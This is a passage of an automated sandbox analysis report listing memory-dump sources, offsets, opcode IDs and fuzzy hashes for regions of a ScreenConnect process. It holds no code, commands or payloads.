                                                                                                                                                                                • Instruction Fuzzy Hash: DD11E5316093849FC709CF2DD890DA5BFA1EF8621070A809AE5858F262CB36ED42CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0323262687ef33042ebc7b3afb9c1b042ee8b299aa5302e7798f42978af9a717
                                                                                                                                                                                • Instruction ID: bc9feb9e95ec1915a82a0c620671182556e82b7f119f84e23f3a9edca8250d9a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0323262687ef33042ebc7b3afb9c1b042ee8b299aa5302e7798f42978af9a717
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F213030A007018FD728DF29E845A6EBBF5FF48711B20CA2CD9A6876A5D774E901CF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b6ad74438425659c7faeaa034e3874550b5e4e9185a5d862a6765243ef9f128
                                                                                                                                                                                • Instruction ID: 0086e336cae8cbfa9faa675ed586f9d63d10fe24c5fb00bba031bba1f2b0991f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b6ad74438425659c7faeaa034e3874550b5e4e9185a5d862a6765243ef9f128
                                                                                                                                                                                • Instruction Fuzzy Hash: 10119031B002095BCB04EB68E941F6EB7E6EFC4750F04852AE505AB399DF70AE0987E1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 46352770613135c03ffccae52da549668333dc52fb242b533bc97555a1dcb40a
                                                                                                                                                                                • Instruction ID: fcd530ac860abf2687493a15eaf8f45359d98236b3a385c15f6e3ce59d0274d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 46352770613135c03ffccae52da549668333dc52fb242b533bc97555a1dcb40a
                                                                                                                                                                                • Instruction Fuzzy Hash: 832137B6C0024A9FCB14CF9AC844ADEBBF5FF48310F148419E919A7210C339A656CFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c8df8616600944352567b182854540f3455908db6c09b114227d35a13ff0a17
                                                                                                                                                                                • Instruction ID: 5d1998904a8965296cbf588bd4f56f3711f94e98d9bb128def48b7b9e9970a1d
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c8df8616600944352567b182854540f3455908db6c09b114227d35a13ff0a17
                                                                                                                                                                                • Instruction Fuzzy Hash: 76114231B003099FCB04EFA8E9819AEBBF9FF89350B108565E519AB355DB30ED05CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2d5a718eb9f1d69e7b9bc1010e68fdfde255712304e919b614cc9d2a42a7e0cf
                                                                                                                                                                                • Instruction ID: e52d0fc051c56a7356cfca939e554ddbd0ade3754c24fd5881375ed9e4c480e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5a718eb9f1d69e7b9bc1010e68fdfde255712304e919b614cc9d2a42a7e0cf
                                                                                                                                                                                • Instruction Fuzzy Hash: D711A371E40219AFDB29CE6CC840AEEB7B6EFC5300F0885B6D914DB294D7729906CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 528ae7afadb377b95a74d63d76ef74a67643bdb173dc6e27f89546bbb0361716
                                                                                                                                                                                • Instruction ID: d10785e6fe443a12660f6408557bcbb0569503b5de110e4eec070afa5b89a230
                                                                                                                                                                                • Opcode Fuzzy Hash: 528ae7afadb377b95a74d63d76ef74a67643bdb173dc6e27f89546bbb0361716
                                                                                                                                                                                • Instruction Fuzzy Hash: AB01A9763001008FC708DB7DE894A6EB7E6EBC8224319847BE609C7365CA72AC17CB65
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 464f59c0945411f67151e38c037213e7f71cc0c6788af58903b5992efa59dfb4
                                                                                                                                                                                • Instruction ID: 67880b3f275cb54fcb80f1c22c50bea253aab4381bb499d726ec9b846b79af22
                                                                                                                                                                                • Opcode Fuzzy Hash: 464f59c0945411f67151e38c037213e7f71cc0c6788af58903b5992efa59dfb4
                                                                                                                                                                                • Instruction Fuzzy Hash: B6116D31E4015ADFCB09DFA9D8448CDBBB2EF89314F45853AD805BB255DB31A91BCB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7c70cfd2dd8cca4e727b984f21d801bfb48c2a017bcc533bf44d6ecd091dea51
                                                                                                                                                                                • Instruction ID: 75890a725bd46047722f40b942891abc96c20bb3db3f47ec9da42fc8534bcfab
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c70cfd2dd8cca4e727b984f21d801bfb48c2a017bcc533bf44d6ecd091dea51
                                                                                                                                                                                • Instruction Fuzzy Hash: FA012B303815018FDB26F7B8981459D7BB5DFC5750B458466C01EDB791EE24490393D2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 518eaaccddc6bf5a1835b03d5d53b8c31b8d8c35654bcfa3a23d025c0bb56142
                                                                                                                                                                                • Instruction ID: 889a564f91866283b5c3a63eb109713d449da832e91e1b16ac8eb5b05979f0d5
                                                                                                                                                                                • Opcode Fuzzy Hash: 518eaaccddc6bf5a1835b03d5d53b8c31b8d8c35654bcfa3a23d025c0bb56142
                                                                                                                                                                                • Instruction Fuzzy Hash: AA01A231B103155B8B1DDB6DA94486BBAEDEFC4664314896BD505DB305EFB1DC0687C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bc3c203506221d4b25693de40db1a6ae76b17a625e26b2292f8b77f66d992416
                                                                                                                                                                                • Instruction ID: dc72f7680e56bde19ca2180b8ad9c8573c0fa0c166f9ca1ad79755e5040d7cee
                                                                                                                                                                                • Opcode Fuzzy Hash: bc3c203506221d4b25693de40db1a6ae76b17a625e26b2292f8b77f66d992416
                                                                                                                                                                                • Instruction Fuzzy Hash: 95012175B0011A9BDF10DA9DD8049EFB7B9EFC8211F048537E515E7240EB309A1587E2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3888522738.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_bfd000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 53d66428c44cd8e49e70579415b456e8c36ae3de3493681ba3f8dff68016531e
                                                                                                                                                                                • Instruction ID: ea751f75be623c6dc32022cbfe0f7cddbba20aaa1bf0e82ed59f8628d5824fe6
                                                                                                                                                                                • Opcode Fuzzy Hash: 53d66428c44cd8e49e70579415b456e8c36ae3de3493681ba3f8dff68016531e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F012B31104348DAD7208A35CCC4B77BFDCEF46320F18C4AAEE480B286C6799809C6B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6383b3a94e4eca4da5422ce3f86aabe694ce3faa9455e897d36ce37181f3fba5
                                                                                                                                                                                • Instruction ID: ac388dccac7a129ce6780fadc653a532a1e9a63a943634d706bba917d708975b
                                                                                                                                                                                • Opcode Fuzzy Hash: 6383b3a94e4eca4da5422ce3f86aabe694ce3faa9455e897d36ce37181f3fba5
                                                                                                                                                                                • Instruction Fuzzy Hash: 8E112A3090170ACFCB18DF6CC585AADBBF4EF45324F11869AE515EB2A2EB70D581CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3e6df1f23ed11d28cfcba12c3e84e1add6bb540c8985862291f45b0f2214b3c5
                                                                                                                                                                                • Instruction ID: f4a709bdeb56f3dedac11164d18a5deaf1944b1e3028d17cb391e75a5e78a830
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e6df1f23ed11d28cfcba12c3e84e1add6bb540c8985862291f45b0f2214b3c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B01703034D3418FC30B9B6DA9A4A5A7FE9DF8221030884F7D009CB266DF309D06C750
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 50758c8bdad01b9a8924ee94ea6248595f4c212c592e6b60ef4e2aaa1066cb37
                                                                                                                                                                                • Instruction ID: f43fe3a592355a097c0b0fa9e4fdca6e80c89a22beaa87a302fa87a6951096c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 50758c8bdad01b9a8924ee94ea6248595f4c212c592e6b60ef4e2aaa1066cb37
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A018470E0020DAFDF04EBA8E8515EDBBB5EFC8350F1085AAC41597354EF315A068B80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3888522738.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_bfd000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a51603758a32c0678de3da0a76acdd6671fe49b2348aa66ee3c624b4ef0201ba
                                                                                                                                                                                • Instruction ID: a16a1cf926bd99b8716cbf5fa63dad73806b25e34ce82f8b25e9a05b1b245d72
                                                                                                                                                                                • Opcode Fuzzy Hash: a51603758a32c0678de3da0a76acdd6671fe49b2348aa66ee3c624b4ef0201ba
                                                                                                                                                                                • Instruction Fuzzy Hash: DC01527150D3C49ED7128B258894766BFB4EF53224F1984DBD9888F1D3C2699849C772
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 438975bc6a59ee0800d1d2a09728d66b6fd6534ada07440a46e315ef8b94db5c
                                                                                                                                                                                • Instruction ID: 9b789260e61021537103f46ce9f547e1d99da7cd2e72b8f2402297169c939d51
                                                                                                                                                                                • Opcode Fuzzy Hash: 438975bc6a59ee0800d1d2a09728d66b6fd6534ada07440a46e315ef8b94db5c
                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0A4322042496FCB069FA89C509EE3BF6EFC8360B04441AE509D72A1CB3189129791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ba4434bf0ac4dd186d3e1b66cbc3a6a039cbfc15c81e784f3db9ed27ccf670a
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F0F6725082504FC31AC7BCF851A9D3FE0EE8225074905EBD441CF1A6C758B909D352
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fb048ed04843670529af5b63f011742292348129f445dad009efd7b6c435727b
                                                                                                                                                                                • Instruction ID: 87cf47c7c5624d9b23946eec9f2d902a3dff82570111e523bd2a2830325f7ae1
                                                                                                                                                                                • Opcode Fuzzy Hash: fb048ed04843670529af5b63f011742292348129f445dad009efd7b6c435727b
                                                                                                                                                                                • Instruction Fuzzy Hash: DFF0E533A0D3545FC725CB7A980199B7FE9CF86214709C0BFD44DC3691D9389402C725
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 497da083f7d324be6c4a8cac7d2ea558b57ff90dd6c3f6751b99e94b4664ead9
                                                                                                                                                                                • Instruction ID: 5a2e1a0d5de8d1aa3d19e6fe77a5d0edd38ad002a977752d81c31e7e3627e0e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 497da083f7d324be6c4a8cac7d2ea558b57ff90dd6c3f6751b99e94b4664ead9
                                                                                                                                                                                • Instruction Fuzzy Hash: E3F06D70D8020EDFDF08DF98EA5476E7FB8FB44314F008C66D21097248CB7425558B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f708631ad731b248d5f962e9e840a67884de630d05d5f158c321c7f76ad32a0e
                                                                                                                                                                                • Instruction ID: 187d88aa1711ebdcaff1c9f175685250ec77b0387599d033fcbcaf24642bc910
                                                                                                                                                                                • Opcode Fuzzy Hash: f708631ad731b248d5f962e9e840a67884de630d05d5f158c321c7f76ad32a0e
                                                                                                                                                                                • Instruction Fuzzy Hash: FDF0E274E0020CEFCB08EFE8D995AACBBF5FB44244F1040A9D505A7254EB306E84CB42
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ba4d1965509cf29b064a7cbec3f5377f2936d9b9e7796fb7bed5bde21ad5f912
                                                                                                                                                                                • Instruction ID: e3dea148cf552290acc9f49eb4780035f34b596de0e02cb8c2769d7dc9971d90
                                                                                                                                                                                • Opcode Fuzzy Hash: ba4d1965509cf29b064a7cbec3f5377f2936d9b9e7796fb7bed5bde21ad5f912
                                                                                                                                                                                • Instruction Fuzzy Hash: CFF01730B001158FD719DB6DC554AAEBBE1EF887517048069E809CB264EB34DD11CB81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9f29d7ad88a2a7940198e2df728c3f193b902065ea1da4c34f23f4b423efe5f8
                                                                                                                                                                                • Instruction ID: 6c280fb1772447864ac3ae2cad2548fd6eeefc15f2316b737bd191586d0013c2
                                                                                                                                                                                • Opcode Fuzzy Hash: 9f29d7ad88a2a7940198e2df728c3f193b902065ea1da4c34f23f4b423efe5f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FE065357042096F4B09DA4ED400D9BBBEADFC8221714C026F909CB315DB31DD0287A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 296db105000304a4b3d7e7c379d1f5cbb582bdb2b89bbf4092b93ab29ee16a63
                                                                                                                                                                                • Instruction ID: 7a832e4f06382b0da65b3e1e4b0b758841559f1eb554401584b34fb8703a2f19
                                                                                                                                                                                • Opcode Fuzzy Hash: 296db105000304a4b3d7e7c379d1f5cbb582bdb2b89bbf4092b93ab29ee16a63
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF06D70D8424ADFDF05EFA8E969B6EBF78FB45300F008C6AD5109B299CB782545CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8463550dfd2672efb4940b4adc3741b3ac6eb0dd5e9c00b1ead7295835befd46
                                                                                                                                                                                • Instruction ID: 85adcdafbaa246dcac47778d8bb6a4590280e8cb9fca32e1091abd4021c93885
                                                                                                                                                                                • Opcode Fuzzy Hash: 8463550dfd2672efb4940b4adc3741b3ac6eb0dd5e9c00b1ead7295835befd46
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F090313046044BE714DAB8F58591DB7E9DF802A07148A6BD8158B295DB72E9058781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: aa09c99327da108c993cf314106cf8bc01f995d6fe18e0fbbc6cf74c7085bdbc
                                                                                                                                                                                • Instruction ID: 8f079def0b12f4c384f9db49a1faf65372614f5cb1626df074b02dd05c68b4a2
                                                                                                                                                                                • Opcode Fuzzy Hash: aa09c99327da108c993cf314106cf8bc01f995d6fe18e0fbbc6cf74c7085bdbc
                                                                                                                                                                                • Instruction Fuzzy Hash: 40F0A7353052185FC711ABB8E858C9D3BA6DBC926131441B7D826CB3C5CF309806C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7c5516fd415d6b1a2d151f6a649437b8ac955fa36b82a94702682ab049617f65
                                                                                                                                                                                • Instruction ID: 8877aa69ce343ab56edf208bb8a4aba7af7f57855de1b4cf9792d62694a9400b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c5516fd415d6b1a2d151f6a649437b8ac955fa36b82a94702682ab049617f65
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0A7316092004BC709A778E951A9E3BE5DEC171171489FFE145CB291DF769C09C7D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f96e6ad62f3815f80032e9e9b545643047475941f702457df8f9ef6b3acb749
                                                                                                                                                                                • Instruction ID: c60b4c92837eff34ce2632b0f9ab54b2dd11990b17ac5ebe0245488de1ebc7e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f96e6ad62f3815f80032e9e9b545643047475941f702457df8f9ef6b3acb749
                                                                                                                                                                                • Instruction Fuzzy Hash: ACF0D471E00219DF8B44DFADC84169EFBF5EF49200B24C06AD918EB210E331AA12CFC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d3efb3a3cd48e5d9207bd86521da86e941383a804ce683ec1efe7e2cc3ef0446
                                                                                                                                                                                • Instruction ID: 47d9f7fa39bbd43165ecbb865280c1c62a938df0a83697bcf608438bf4cc01b0
                                                                                                                                                                                • Opcode Fuzzy Hash: d3efb3a3cd48e5d9207bd86521da86e941383a804ce683ec1efe7e2cc3ef0446
                                                                                                                                                                                • Instruction Fuzzy Hash: 54D0A7054483C50FEB1127B548517F53FDC4F46A04F4D04D6E0C4C715BD918E08B5231
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bacff39b275acba1932600c3c529ddeb0ac07b04d726ae5231219acc007a86d2
                                                                                                                                                                                • Instruction ID: 4c5b8aea9a1a15fcc8d6d71027884cc5d8705ddc970e1a6f4378913642d11a70
                                                                                                                                                                                • Opcode Fuzzy Hash: bacff39b275acba1932600c3c529ddeb0ac07b04d726ae5231219acc007a86d2
                                                                                                                                                                                • Instruction Fuzzy Hash: 31E04F7051D3809FC741DF389D14549BFF0AE06200B4684AFD8C9C7651E634A84AC762
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                • Instruction ID: 2fc6dc1aebb5041c387f502a2819851d65969308fb056af5560a02d0354e21b9
                                                                                                                                                                                • Opcode Fuzzy Hash: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
